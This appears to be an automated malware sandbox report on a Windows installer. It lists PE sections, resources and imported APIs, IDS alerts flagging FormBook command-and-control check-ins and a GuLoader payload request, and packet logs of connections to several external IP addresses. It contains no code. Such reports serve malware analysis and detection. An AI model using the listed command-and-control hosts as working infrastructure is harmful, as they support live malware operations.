IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5f7d | 0x6000 | False | 0.6680094401041666 | data | 6.466064816043304 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x123e | 0x1400 | False | 0.4275390625 | data | 4.989734782278587 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x1a818 | 0x400 | False | 0.638671875 | data | 5.130817636118804 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x24000 | 0x16000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x3a000 | 0x21d08 | 0x21e00 | False | 0.9174858740774908 | data | 7.758972914922993 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x3a418 | 0x11d3c | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9978499041358532
RT_ICON | 0x4c158 | 0x6782 | PNG image data, 256 x 256, 8-bit colormap, non-interlaced | English | United States | 0.9879990942712658
RT_ICON | 0x528e0 | 0x28b6 | PNG image data, 256 x 256, 4-bit colormap, non-interlaced | English | United States | 0.9959700633275763
RT_ICON | 0x55198 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.6062240663900414
RT_ICON | 0x57740 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.6512664165103189
RT_ICON | 0x587e8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304 | English | United States | 0.6993603411513859
RT_ICON | 0x59690 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024 | English | United States | 0.7928700361010831
RT_ICON | 0x59f38 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.526219512195122
RT_ICON | 0x5a5a0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256 | English | United States | 0.7247109826589595
RT_ICON | 0x5ab08 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.7287234042553191
RT_ICON | 0x5af70 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.6693548387096774
RT_ICON | 0x5b258 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.7128378378378378
RT_DIALOG | 0x5b380 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x5b480 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x5b5a0 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x5b668 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x5b6c8 | 0xae | data | English | United States | 0.6264367816091954
RT_VERSION | 0x5b778 | 0x24c | data | English | United States | 0.4812925170068027
RT_MANIFEST | 0x5b9c8 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
                                                                                      DLLImport
KERNEL32.dll: GetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetFileAttributesA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileTime, GetFileAttributesA, SetCurrentDirectoryA, MoveFileA, GetFullPathNameA, GetShortPathNameA, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, DeleteFileA, FindFirstFileA, FindNextFileA, FindClose, SetFilePointer, GetPrivateProfileStringA, WritePrivateProfileStringA, MulDiv, MultiByteToWideChar, FreeLibrary, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
USER32.dll: GetSystemMenu, SetClassLongA, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, LoadImageA, CreateDialogParamA, SetTimer, SetWindowTextA, SetForegroundWindow, ShowWindow, SetWindowLongA, SendMessageTimeoutA, FindWindowExA, IsWindow, AppendMenuA, TrackPopupMenu, CreatePopupMenu, DrawTextA, EndPaint, DestroyWindow, wsprintfA, PostQuitMessage
GDI32.dll: SelectObject, SetTextColor, SetBkMode, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, GetDeviceCaps, SetBkColor
SHELL32.dll: SHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
ADVAPI32.dll: AdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll: ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll: OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
10/16/23-11:30:34.341610 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 50130 | 80 | 192.168.11.30 | 23.227.38.74
10/16/23-11:32:59.120800 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 50138 | 80 | 192.168.11.30 | 3.33.130.190
10/16/23-11:31:15.754112 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 50133 | 80 | 192.168.11.30 | 23.227.38.74
10/16/23-11:29:13.108417 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 50127 | 80 | 192.168.11.30 | 104.21.19.227
10/16/23-11:29:33.045985 | UDP | 2023883 | ET DNS Query to a *.top domain - Likely Hostile | 58176 | 53 | 192.168.11.30 | 1.1.1.1
10/16/23-11:34:01.586007 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 50142 | 80 | 192.168.11.30 | 104.247.82.51
10/16/23-11:31:36.580336 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 50134 | 80 | 192.168.11.30 | 66.96.162.133
10/16/23-11:34:22.055359 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 50146 | 80 | 192.168.11.30 | 208.91.197.27
10/16/23-11:34:44.313076 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 50147 | 80 | 192.168.11.30 | 172.67.210.176
10/16/23-11:31:57.444382 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 50135 | 80 | 192.168.11.30 | 104.247.82.90
10/16/23-11:29:52.922186 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 50129 | 80 | 192.168.11.30 | 103.224.212.210
10/16/23-11:33:40.532597 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 50141 | 80 | 192.168.11.30 | 172.67.193.177
10/16/23-11:29:33.638445 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 50128 | 80 | 192.168.11.30 | 172.67.148.68
10/16/23-11:27:46.501036 | TCP | 2855192 | ETPRO TROJAN GuLoader Encoded Binary Request M2 | 50125 | 80 | 192.168.11.30 | 103.72.68.128
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                      Oct 16, 2023 11:27:48.314483881 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.314490080 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.314513922 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.314532995 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.314630032 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.314671040 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.314745903 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.314795971 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.314799070 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.314866066 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.314881086 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.314934969 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.314955950 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.314990044 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.315023899 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.315026999 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.315053940 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.315082073 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.315109015 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.315126896 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.315347910 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.672399044 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.672493935 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.672561884 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.672580957 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.672683954 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.672753096 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.672770023 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.672838926 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.672868013 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.672930956 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.672966003 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.673048973 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.673067093 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.673161030 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.673204899 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.673250914 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.673269987 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.673352957 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.673360109 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.673437119 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.673458099 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.673523903 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.673571110 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.673620939 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.673692942 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.673799992 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.673804045 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.673861980 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.673903942 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.673984051 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.673994064 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.674069881 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.674082994 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.674174070 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.674245119 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.674253941 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.674339056 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.674344063 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.674407959 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.674436092 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.674513102 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.674524069 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.674602985 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.674618006 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:48.674721003 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:48.674772978 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:27:52.378097057 CEST8050125103.72.68.128192.168.11.30
                                                                                      Oct 16, 2023 11:27:52.378310919 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:28:42.846146107 CEST5012580192.168.11.30103.72.68.128
                                                                                      Oct 16, 2023 11:29:12.941868067 CEST5012780192.168.11.30104.21.19.227
                                                                                      Oct 16, 2023 11:29:13.108045101 CEST8050127104.21.19.227192.168.11.30
                                                                                      Oct 16, 2023 11:29:13.108350992 CEST5012780192.168.11.30104.21.19.227
                                                                                      Oct 16, 2023 11:29:13.108417034 CEST5012780192.168.11.30104.21.19.227
                                                                                      Oct 16, 2023 11:29:13.274713039 CEST8050127104.21.19.227192.168.11.30
                                                                                      Oct 16, 2023 11:29:13.284326077 CEST8050127104.21.19.227192.168.11.30
                                                                                      Oct 16, 2023 11:29:13.284408092 CEST8050127104.21.19.227192.168.11.30
                                                                                      Oct 16, 2023 11:29:13.284780025 CEST5012780192.168.11.30104.21.19.227
                                                                                      Oct 16, 2023 11:29:13.284847021 CEST5012780192.168.11.30104.21.19.227
                                                                                      Oct 16, 2023 11:29:13.451172113 CEST8050127104.21.19.227192.168.11.30
                                                                                      Oct 16, 2023 11:29:33.471681118 CEST5012880192.168.11.30172.67.148.68
                                                                                      Oct 16, 2023 11:29:33.638051987 CEST8050128172.67.148.68192.168.11.30
                                                                                      Oct 16, 2023 11:29:33.638444901 CEST5012880192.168.11.30172.67.148.68
                                                                                      Oct 16, 2023 11:29:33.638444901 CEST5012880192.168.11.30172.67.148.68
                                                                                      Oct 16, 2023 11:29:33.804574966 CEST8050128172.67.148.68192.168.11.30
                                                                                      Oct 16, 2023 11:29:34.123421907 CEST8050128172.67.148.68192.168.11.30
                                                                                      Oct 16, 2023 11:29:34.123528004 CEST8050128172.67.148.68192.168.11.30
                                                                                      Oct 16, 2023 11:29:34.123585939 CEST8050128172.67.148.68192.168.11.30
                                                                                      Oct 16, 2023 11:29:34.123644114 CEST8050128172.67.148.68192.168.11.30
                                                                                      Oct 16, 2023 11:29:34.123694897 CEST8050128172.67.148.68192.168.11.30
                                                                                      Oct 16, 2023 11:29:34.123975992 CEST5012880192.168.11.30172.67.148.68
                                                                                      Oct 16, 2023 11:29:34.123976946 CEST5012880192.168.11.30172.67.148.68
                                                                                      Oct 16, 2023 11:29:34.124068975 CEST5012880192.168.11.30172.67.148.68
                                                                                      Oct 16, 2023 11:29:52.752248049 CEST5012980192.168.11.30103.224.212.210
                                                                                      Oct 16, 2023 11:29:52.921561956 CEST8050129103.224.212.210192.168.11.30
                                                                                      Oct 16, 2023 11:29:52.922079086 CEST5012980192.168.11.30103.224.212.210
                                                                                      Oct 16, 2023 11:29:52.922185898 CEST5012980192.168.11.30103.224.212.210
                                                                                      Oct 16, 2023 11:29:53.120343924 CEST8050129103.224.212.210192.168.11.30
                                                                                      Oct 16, 2023 11:29:53.120412111 CEST8050129103.224.212.210192.168.11.30
                                                                                      Oct 16, 2023 11:29:53.120686054 CEST5012980192.168.11.30103.224.212.210
                                                                                      Oct 16, 2023 11:29:53.120770931 CEST5012980192.168.11.30103.224.212.210
                                                                                      Oct 16, 2023 11:29:53.290122032 CEST8050129103.224.212.210192.168.11.30
                                                                                      Oct 16, 2023 11:30:34.174237967 CEST5013080192.168.11.3023.227.38.74
                                                                                      Oct 16, 2023 11:30:34.341244936 CEST805013023.227.38.74192.168.11.30
                                                                                      Oct 16, 2023 11:30:34.341509104 CEST5013080192.168.11.3023.227.38.74
                                                                                      Oct 16, 2023 11:30:34.341609955 CEST5013080192.168.11.3023.227.38.74
                                                                                      Oct 16, 2023 11:30:34.508002043 CEST805013023.227.38.74192.168.11.30
                                                                                      Oct 16, 2023 11:30:34.520132065 CEST805013023.227.38.74192.168.11.30
                                                                                      Oct 16, 2023 11:30:34.520214081 CEST805013023.227.38.74192.168.11.30
                                                                                      Oct 16, 2023 11:30:34.520272017 CEST805013023.227.38.74192.168.11.30
                                                                                      Oct 16, 2023 11:30:34.520325899 CEST805013023.227.38.74192.168.11.30
                                                                                      Oct 16, 2023 11:30:34.520369053 CEST805013023.227.38.74192.168.11.30
                                                                                      Oct 16, 2023 11:30:34.520416021 CEST805013023.227.38.74192.168.11.30
                                                                                      Oct 16, 2023 11:30:34.520821095 CEST5013080192.168.11.3023.227.38.74
                                                                                      Oct 16, 2023 11:30:34.520822048 CEST5013080192.168.11.3023.227.38.74
                                                                                      Oct 16, 2023 11:30:34.520822048 CEST5013080192.168.11.3023.227.38.74
                                                                                      Oct 16, 2023 11:31:15.587549925 CEST5013380192.168.11.3023.227.38.74
                                                                                      Oct 16, 2023 11:31:15.753714085 CEST805013323.227.38.74192.168.11.30
                                                                                      Oct 16, 2023 11:31:15.754112005 CEST5013380192.168.11.3023.227.38.74
                                                                                      Oct 16, 2023 11:31:15.754112005 CEST5013380192.168.11.3023.227.38.74
                                                                                      Oct 16, 2023 11:31:15.920314074 CEST805013323.227.38.74192.168.11.30
                                                                                      Oct 16, 2023 11:31:15.928987980 CEST805013323.227.38.74192.168.11.30
                                                                                      Oct 16, 2023 11:31:15.929069042 CEST805013323.227.38.74192.168.11.30
                                                                                      Oct 16, 2023 11:31:15.929342031 CEST805013323.227.38.74192.168.11.30
                                                                                      Oct 16, 2023 11:31:15.929372072 CEST5013380192.168.11.3023.227.38.74
                                                                                      Oct 16, 2023 11:31:15.929415941 CEST805013323.227.38.74192.168.11.30
                                                                                      Oct 16, 2023 11:31:15.929462910 CEST805013323.227.38.74192.168.11.30
                                                                                      Oct 16, 2023 11:31:15.929512978 CEST805013323.227.38.74192.168.11.30
                                                                                      Oct 16, 2023 11:31:15.929775953 CEST5013380192.168.11.3023.227.38.74
                                                                                      Oct 16, 2023 11:31:15.929838896 CEST5013380192.168.11.3023.227.38.74
                                                                                      Oct 16, 2023 11:31:36.336205006 CEST5013480192.168.11.3066.96.162.133
                                                                                      Oct 16, 2023 11:31:36.580095053 CEST805013466.96.162.133192.168.11.30
                                                                                      Oct 16, 2023 11:31:36.580255985 CEST5013480192.168.11.3066.96.162.133
                                                                                      Oct 16, 2023 11:31:36.580336094 CEST5013480192.168.11.3066.96.162.133
                                                                                      Oct 16, 2023 11:31:36.829097986 CEST805013466.96.162.133192.168.11.30
                                                                                      Oct 16, 2023 11:31:36.878046989 CEST805013466.96.162.133192.168.11.30
                                                                                      Oct 16, 2023 11:31:36.878109932 CEST805013466.96.162.133192.168.11.30
                                                                                      Oct 16, 2023 11:31:36.878415108 CEST5013480192.168.11.3066.96.162.133
                                                                                      Oct 16, 2023 11:31:36.878492117 CEST5013480192.168.11.3066.96.162.133
                                                                                      Oct 16, 2023 11:31:37.121778965 CEST805013466.96.162.133192.168.11.30
                                                                                      Oct 16, 2023 11:31:56.959136963 CEST5013580192.168.11.30104.247.82.90
                                                                                      Oct 16, 2023 11:31:57.201375008 CEST8050135104.247.82.90192.168.11.30
                                                                                      Oct 16, 2023 11:31:57.201601028 CEST5013580192.168.11.30104.247.82.90
                                                                                      Oct 16, 2023 11:31:57.443955898 CEST8050135104.247.82.90192.168.11.30
                                                                                      Oct 16, 2023 11:31:57.444381952 CEST5013580192.168.11.30104.247.82.90
                                                                                      Oct 16, 2023 11:31:57.686641932 CEST8050135104.247.82.90192.168.11.30
                                                                                      Oct 16, 2023 11:31:57.686768055 CEST8050135104.247.82.90192.168.11.30
                                                                                      Oct 16, 2023 11:31:57.686866045 CEST8050135104.247.82.90192.168.11.30
                                                                                      Oct 16, 2023 11:31:57.687237978 CEST5013580192.168.11.30104.247.82.90
                                                                                      Oct 16, 2023 11:31:57.687238932 CEST5013580192.168.11.30104.247.82.90
                                                                                      Oct 16, 2023 11:31:57.894397974 CEST8050135104.247.82.90192.168.11.30
                                                                                      Oct 16, 2023 11:31:57.894714117 CEST5013580192.168.11.30104.247.82.90
                                                                                      Oct 16, 2023 11:31:57.929636955 CEST8050135104.247.82.90192.168.11.30
                                                                                      Oct 16, 2023 11:31:58.136936903 CEST8050135104.247.82.90192.168.11.30
                                                                                      Oct 16, 2023 11:32:58.954741955 CEST5013880192.168.11.303.33.130.190
                                                                                      Oct 16, 2023 11:32:59.120436907 CEST80501383.33.130.190192.168.11.30
                                                                                      Oct 16, 2023 11:32:59.120702982 CEST5013880192.168.11.303.33.130.190
                                                                                      Oct 16, 2023 11:32:59.120800018 CEST5013880192.168.11.303.33.130.190
                                                                                      Oct 16, 2023 11:32:59.286645889 CEST80501383.33.130.190192.168.11.30
                                                                                      Oct 16, 2023 11:32:59.352847099 CEST80501383.33.130.190192.168.11.30
                                                                                      Oct 16, 2023 11:32:59.352922916 CEST80501383.33.130.190192.168.11.30
                                                                                      Oct 16, 2023 11:32:59.353420973 CEST5013880192.168.11.303.33.130.190
                                                                                      Oct 16, 2023 11:32:59.353420973 CEST5013880192.168.11.303.33.130.190
                                                                                      Oct 16, 2023 11:32:59.366880894 CEST80501383.33.130.190192.168.11.30
                                                                                      Oct 16, 2023 11:32:59.367155075 CEST5013880192.168.11.303.33.130.190
                                                                                      Oct 16, 2023 11:32:59.519355059 CEST80501383.33.130.190192.168.11.30
                                                                                      Oct 16, 2023 11:33:40.365722895 CEST5014180192.168.11.30172.67.193.177
                                                                                      Oct 16, 2023 11:33:40.532143116 CEST8050141172.67.193.177192.168.11.30
                                                                                      Oct 16, 2023 11:33:40.532452106 CEST5014180192.168.11.30172.67.193.177
                                                                                      Oct 16, 2023 11:33:40.532597065 CEST5014180192.168.11.30172.67.193.177
                                                                                      Oct 16, 2023 11:33:40.698848009 CEST8050141172.67.193.177192.168.11.30
                                                                                      Oct 16, 2023 11:33:40.708460093 CEST8050141172.67.193.177192.168.11.30
                                                                                      Oct 16, 2023 11:33:40.708920002 CEST5014180192.168.11.30172.67.193.177
                                                                                      Oct 16, 2023 11:33:40.708993912 CEST8050141172.67.193.177192.168.11.30
                                                                                      Oct 16, 2023 11:33:40.709207058 CEST5014180192.168.11.30172.67.193.177
                                                                                      Oct 16, 2023 11:33:40.875315905 CEST8050141172.67.193.177192.168.11.30
                                                                                      Oct 16, 2023 11:34:01.100727081 CEST5014280192.168.11.30104.247.82.51
                                                                                      Oct 16, 2023 11:34:01.342865944 CEST8050142104.247.82.51192.168.11.30
                                                                                      Oct 16, 2023 11:34:01.343070030 CEST5014280192.168.11.30104.247.82.51
                                                                                      Oct 16, 2023 11:34:01.585756063 CEST8050142104.247.82.51192.168.11.30
Oct 16, 2023 11:34:01.586007118 CEST | 50142 | 80 | 192.168.11.30 | 104.247.82.51
Oct 16, 2023 11:34:01.828356981 CEST | 80 | 50142 | 104.247.82.51 | 192.168.11.30
Oct 16, 2023 11:34:01.828512907 CEST | 80 | 50142 | 104.247.82.51 | 192.168.11.30
Oct 16, 2023 11:34:01.828526020 CEST | 80 | 50142 | 104.247.82.51 | 192.168.11.30
Oct 16, 2023 11:34:01.828980923 CEST | 50142 | 80 | 192.168.11.30 | 104.247.82.51
Oct 16, 2023 11:34:01.828996897 CEST | 50142 | 80 | 192.168.11.30 | 104.247.82.51
Oct 16, 2023 11:34:02.031711102 CEST | 80 | 50142 | 104.247.82.51 | 192.168.11.30
Oct 16, 2023 11:34:02.031938076 CEST | 50142 | 80 | 192.168.11.30 | 104.247.82.51
Oct 16, 2023 11:34:02.071779013 CEST | 80 | 50142 | 104.247.82.51 | 192.168.11.30
Oct 16, 2023 11:34:02.274461031 CEST | 80 | 50142 | 104.247.82.51 | 192.168.11.30
Oct 16, 2023 11:34:21.819355011 CEST | 50146 | 80 | 192.168.11.30 | 208.91.197.27
Oct 16, 2023 11:34:22.055051088 CEST | 80 | 50146 | 208.91.197.27 | 192.168.11.30
Oct 16, 2023 11:34:22.055357933 CEST | 50146 | 80 | 192.168.11.30 | 208.91.197.27
Oct 16, 2023 11:34:22.055358887 CEST | 50146 | 80 | 192.168.11.30 | 208.91.197.27
Oct 16, 2023 11:34:22.335223913 CEST | 80 | 50146 | 208.91.197.27 | 192.168.11.30
Oct 16, 2023 11:34:22.340970993 CEST | 80 | 50146 | 208.91.197.27 | 192.168.11.30
Oct 16, 2023 11:34:22.341447115 CEST | 50146 | 80 | 192.168.11.30 | 208.91.197.27
Oct 16, 2023 11:34:22.341447115 CEST | 50146 | 80 | 192.168.11.30 | 208.91.197.27
Oct 16, 2023 11:34:22.542505980 CEST | 80 | 50146 | 208.91.197.27 | 192.168.11.30
Oct 16, 2023 11:34:22.542903900 CEST | 50146 | 80 | 192.168.11.30 | 208.91.197.27
Oct 16, 2023 11:34:22.577248096 CEST | 80 | 50146 | 208.91.197.27 | 192.168.11.30
Oct 16, 2023 11:34:44.146018982 CEST | 50147 | 80 | 192.168.11.30 | 172.67.210.176
Oct 16, 2023 11:34:44.312604904 CEST | 80 | 50147 | 172.67.210.176 | 192.168.11.30
Oct 16, 2023 11:34:44.313075066 CEST | 50147 | 80 | 192.168.11.30 | 172.67.210.176
Oct 16, 2023 11:34:44.313076019 CEST | 50147 | 80 | 192.168.11.30 | 172.67.210.176
Oct 16, 2023 11:34:44.479768991 CEST | 80 | 50147 | 172.67.210.176 | 192.168.11.30
Oct 16, 2023 11:34:44.818830967 CEST | 50147 | 80 | 192.168.11.30 | 172.67.210.176
Oct 16, 2023 11:34:44.985645056 CEST | 80 | 50147 | 172.67.210.176 | 192.168.11.30
Oct 16, 2023 11:34:44.986042023 CEST | 50147 | 80 | 192.168.11.30 | 172.67.210.176
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 16, 2023 11:26:43.845520020 CEST | 56312 | 53 | 192.168.11.30 | 1.1.1.1
Oct 16, 2023 11:29:12.770318985 CEST | 51226 | 53 | 192.168.11.30 | 1.1.1.1
Oct 16, 2023 11:29:12.940845966 CEST | 53 | 51226 | 1.1.1.1 | 192.168.11.30
Oct 16, 2023 11:29:33.045984983 CEST | 58176 | 53 | 192.168.11.30 | 1.1.1.1
Oct 16, 2023 11:29:33.470616102 CEST | 53 | 58176 | 1.1.1.1 | 192.168.11.30
Oct 16, 2023 11:29:52.572699070 CEST | 57682 | 53 | 192.168.11.30 | 1.1.1.1
Oct 16, 2023 11:29:52.751010895 CEST | 53 | 57682 | 1.1.1.1 | 192.168.11.30
Oct 16, 2023 11:30:33.908983946 CEST | 57881 | 53 | 192.168.11.30 | 1.1.1.1
Oct 16, 2023 11:30:34.173155069 CEST | 53 | 57881 | 1.1.1.1 | 192.168.11.30
Oct 16, 2023 11:30:54.607141018 CEST | 54308 | 53 | 192.168.11.30 | 1.1.1.1
Oct 16, 2023 11:30:54.831906080 CEST | 53 | 54308 | 1.1.1.1 | 192.168.11.30
